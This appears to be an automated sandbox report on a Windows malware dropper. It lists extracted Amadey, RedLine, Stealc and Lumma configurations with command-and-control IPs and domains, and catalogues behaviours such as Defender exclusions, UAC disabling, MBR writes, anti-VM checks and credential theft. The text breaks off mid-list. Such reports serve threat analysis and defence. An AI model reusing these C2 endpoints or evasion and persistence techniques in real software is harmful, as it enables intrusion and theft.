Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
30-05-2024 03:45
Static task
static1
Behavioral task
behavioral1
Sample
62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe
Resource
win10v2004-20240426-en
General
-
Target
62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe
-
Size
1.9MB
-
MD5
eac6fdde5df959773d9f807516197192
-
SHA1
f189d4baabb2e96f819c38a1e2f2de5ad9b037cd
-
SHA256
62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22
-
SHA512
8ef7a8bb9be5a1a85c01ef747928ef9ad7db2b6ebc379e4d1c61f8a81642ed2b7df09aafcfb25be38dbe5d307453e8bb770905e37a1a62e8406370e28e16fdaf
-
SSDEEP
49152:Ai2TXzm2CrBNlklUFRuTll817Ptx5fROwW:Ai2TXwrBnFRuTs7Ptx5Z
Malware Config
Extracted
amadey
4.21
49e482
http://147.45.47.70
-
install_dir
1b29d73536
-
install_file
axplont.exe
-
strings_key
4d31dd1a190d9879c21fac6d87dc0043
-
url_paths
/tr8nomy/index.php
Extracted
redline
1
185.215.113.67:40960
Extracted
redline
@LOGSCLOUDYT_BOT
185.172.128.33:8970
Extracted
stealc
zzvv
http://23.88.106.134
-
url_path
/c73eed764cc59dcb.php
Extracted
lumma
https://roomabolishsnifftwk.shop/api
https://museumtespaceorsp.shop/api
https://buttockdecarderwiso.shop/api
https://averageaattractiionsl.shop/api
https://femininiespywageg.shop/api
https://detailbaconroollyws.shop/api
https://employhabragaomlsp.shop/api
https://horsedwollfedrwos.shop/api
https://stalfbaclcalorieeis.shop/api
https://patternapplauderw.shop/api
https://civilianurinedtsraov.shop/api
https://understanndtytonyguw.shop/api
https://considerrycurrentyws.shop/api
https://messtimetabledkolvk.shop/api
https://deprivedrinkyfaiir.shop/api
https://relaxtionflouwerwi.shop/api
Signatures
-
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
5MoH8bIPQ8SA8ROOsxUfnRrI.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" 5MoH8bIPQ8SA8ROOsxUfnRrI.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe family_redline behavioral2/memory/5116-78-0x00000000006F0000-0x0000000000742000-memory.dmp family_redline C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe family_redline behavioral2/memory/756-83-0x00000000003F0000-0x0000000000442000-memory.dmp family_redline -
Processes:
file300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe -
Processes:
file300un.exe5MoH8bIPQ8SA8ROOsxUfnRrI.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" 5MoH8bIPQ8SA8ROOsxUfnRrI.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
Processes:
5MoH8bIPQ8SA8ROOsxUfnRrI.exeaxplont.exeaxplont.exe62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exeaxplont.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5MoH8bIPQ8SA8ROOsxUfnRrI.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplont.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplont.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplont.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 201 3380 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepid process 2544 powershell.exe 3700 powershell.exe 2900 powershell.exe 2152 powershell.exe 3288 powershell.EXE 1676 powershell.exe 4436 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exeaxplont.exeaxplont.exeInstall.exerundll32.exe5MoH8bIPQ8SA8ROOsxUfnRrI.exeaxplont.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5MoH8bIPQ8SA8ROOsxUfnRrI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5MoH8bIPQ8SA8ROOsxUfnRrI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplont.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
RegAsm.exeRegAsm.exefile300un.exeInstall.exemFHhzFD.exe62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exeaxplont.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation file300un.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation mFHhzFD.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation 62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation axplont.exe -
Drops startup file 7 IoCs
Processes:
CasPol.exe6gOQA073DOsYkG6b0EgvvAcd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v1qzaERnffknuPgDQ7VNqfXT.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DvusSCfcuG8ANn3bW2XJWnrs.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\65SSH565EumlmslpPTUiUKnl.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Task Manager.lnk 6gOQA073DOsYkG6b0EgvvAcd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N9rC1hpQP7M2PJ6BV3slvC7b.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xC5jdcWArjyBGAnOOxyjqoSq.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FPph4fgdmcU50Bfgx9FYmuk5.bat CasPol.exe -
Executes dropped EXE 20 IoCs
Processes:
axplont.exe33333.exefileosn.exeOne.exesvhoost.exelumma1234.exegold.exeswizzzz.exefile300un.exeThdYwKZvKmIzn3rj3JtxK05A.exeSJLhmzYCwLH1f34kc7MVy0ZE.exe5MoH8bIPQ8SA8ROOsxUfnRrI.exe6gOQA073DOsYkG6b0EgvvAcd.exeaxplont.exemmlrDdjIh8SWGrRHE0rDm0Rb.exeInstall.exeInstall.exeInstall.exemFHhzFD.exeaxplont.exepid process 2068 axplont.exe 1428 33333.exe 5116 fileosn.exe 436 One.exe 756 svhoost.exe 3224 lumma1234.exe 4508 gold.exe 4928 swizzzz.exe 3508 file300un.exe 1840 ThdYwKZvKmIzn3rj3JtxK05A.exe 936 SJLhmzYCwLH1f34kc7MVy0ZE.exe 2148 5MoH8bIPQ8SA8ROOsxUfnRrI.exe 1432 6gOQA073DOsYkG6b0EgvvAcd.exe 3296 axplont.exe 4784 mmlrDdjIh8SWGrRHE0rDm0Rb.exe 3648 Install.exe 4160 Install.exe 2456 Install.exe 2776 mFHhzFD.exe 4816 axplont.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exeaxplont.exeaxplont.exeaxplont.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine 62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine axplont.exe Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine axplont.exe Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine axplont.exe -
Loads dropped DLL 2 IoCs
Processes:
ThdYwKZvKmIzn3rj3JtxK05A.exerundll32.exepid process 1840 ThdYwKZvKmIzn3rj3JtxK05A.exe 3380 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe themida behavioral2/memory/2148-302-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral2/memory/2148-323-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral2/memory/2148-325-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral2/memory/2148-324-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral2/memory/2148-322-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral2/memory/2148-356-0x0000000140000000-0x000000014159C000-memory.dmp themida -
Processes:
5MoH8bIPQ8SA8ROOsxUfnRrI.exefile300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" 5MoH8bIPQ8SA8ROOsxUfnRrI.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths file300un.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" file300un.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
file300un.exe5MoH8bIPQ8SA8ROOsxUfnRrI.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5MoH8bIPQ8SA8ROOsxUfnRrI.exe -
Drops Chrome extension 2 IoCs
Processes:
mFHhzFD.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json mFHhzFD.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json mFHhzFD.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
Install.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 133 api.myip.com 134 api.myip.com 136 ipinfo.io 139 ipinfo.io -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
ThdYwKZvKmIzn3rj3JtxK05A.exedescription ioc process File opened for modification \??\PhysicalDrive0 ThdYwKZvKmIzn3rj3JtxK05A.exe -
Drops file in System32 directory 35 IoCs
Processes:
Install.exepowershell.exemFHhzFD.exe5MoH8bIPQ8SA8ROOsxUfnRrI.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 mFHhzFD.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini 5MoH8bIPQ8SA8ROOsxUfnRrI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA mFHhzFD.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 mFHhzFD.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI 5MoH8bIPQ8SA8ROOsxUfnRrI.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 mFHhzFD.exe File opened for modification C:\Windows\System32\GroupPolicy 5MoH8bIPQ8SA8ROOsxUfnRrI.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 5MoH8bIPQ8SA8ROOsxUfnRrI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData mFHhzFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 mFHhzFD.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol mFHhzFD.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
Processes:
62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exeaxplont.exe5MoH8bIPQ8SA8ROOsxUfnRrI.exeaxplont.exeaxplont.exepid process 4508 62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe 2068 axplont.exe 2148 5MoH8bIPQ8SA8ROOsxUfnRrI.exe 2148 5MoH8bIPQ8SA8ROOsxUfnRrI.exe 3296 axplont.exe 4816 axplont.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
33333.exegold.exeswizzzz.exefile300un.exeSJLhmzYCwLH1f34kc7MVy0ZE.exeAddInProcess32.exedescription pid process target process PID 1428 set thread context of 4548 1428 33333.exe RegAsm.exe PID 4508 set thread context of 696 4508 gold.exe RegAsm.exe PID 4928 set thread context of 4592 4928 swizzzz.exe RegAsm.exe PID 3508 set thread context of 3256 3508 file300un.exe CasPol.exe PID 936 set thread context of 3208 936 SJLhmzYCwLH1f34kc7MVy0ZE.exe AddInProcess32.exe PID 936 set thread context of 3184 936 SJLhmzYCwLH1f34kc7MVy0ZE.exe AddInProcess32.exe PID 3208 set thread context of 4492 3208 AddInProcess32.exe InstallUtil.exe -
Drops file in Program Files directory 14 IoCs
Processes:
mFHhzFD.exedescription ioc process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi mFHhzFD.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak mFHhzFD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak mFHhzFD.exe File created C:\Program Files (x86)\tegRANPZONsU2\FcWcCnF.xml mFHhzFD.exe File created C:\Program Files (x86)\YLgKyOFzWxOqC\sECwqfW.xml mFHhzFD.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi mFHhzFD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja mFHhzFD.exe File created C:\Program Files (x86)\JipyTrDkU\zCzpeRf.xml mFHhzFD.exe File created C:\Program Files (x86)\nFLFFjqrQPUn\WjzSeVe.dll mFHhzFD.exe File created C:\Program Files (x86)\JipyTrDkU\UhtGxG.dll mFHhzFD.exe File created C:\Program Files (x86)\tegRANPZONsU2\UUihwtyGLxlGm.dll mFHhzFD.exe File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\xEuZZMb.dll mFHhzFD.exe File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\mTHmWcc.xml mFHhzFD.exe File created C:\Program Files (x86)\YLgKyOFzWxOqC\FsFKYYw.dll mFHhzFD.exe -
Drops file in Windows directory 5 IoCs
Processes:
62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\axplont.job 62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe File created C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job schtasks.exe File created C:\Windows\Tasks\WKALCIrwIEiqhKBsn.job schtasks.exe File created C:\Windows\Tasks\jiLwFdOzPPQiWLm.job schtasks.exe File created C:\Windows\Tasks\QdCYtDviHOrgqJLgZ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1784 1428 WerFault.exe 33333.exe 724 4508 WerFault.exe gold.exe 4204 2456 WerFault.exe Install.exe 4448 4160 WerFault.exe Install.exe 2444 2776 WerFault.exe mFHhzFD.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
AddInProcess32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AddInProcess32.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AddInProcess32.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AddInProcess32.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4228 schtasks.exe 1884 schtasks.exe 1716 schtasks.exe 2268 schtasks.exe 1156 schtasks.exe 2324 schtasks.exe 3276 schtasks.exe 4288 schtasks.exe 1916 schtasks.exe 3276 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2720 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exemFHhzFD.exerundll32.exepowershell.exepowershell.exepowershell.exeInstall.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b8b1c3f9-0000-0000-0000-d01200000000} mFHhzFD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created 